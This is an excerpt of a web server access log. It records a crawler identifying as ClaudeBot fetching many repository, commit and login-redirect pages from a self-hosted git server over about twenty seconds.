"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11915] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11911] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" [Client 216.73.216.188] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" [Client 216.73.216.188] [Length 10357] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12783] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11886] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 216.73.216.188] [Length 11347] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11880] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Febd2be03a23e76e126207d40a257d72f40ab9a7c..main" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11646] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11652] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10886] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10892] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fmain...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec...main" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14208] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11515] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2F+PostgreSQL+%EC%9E%91%EC%97%85.md" [Client 216.73.216.188] [Length 20801] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11965] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11960] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 10897] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 216.73.216.188] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 90550] [Gzip 12.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 453232] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-6.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 12547] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-1.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-7.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2F%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4+%ED%8A%B8%EB%A6%AC%EA%B1%B0+%EC%A0%81%EC%9A%A9.md" [Client 216.73.216.188] [Length 22608] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-4.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-2.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fpyvenv.cfg" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:58 +0000] - 404 404 - GET https 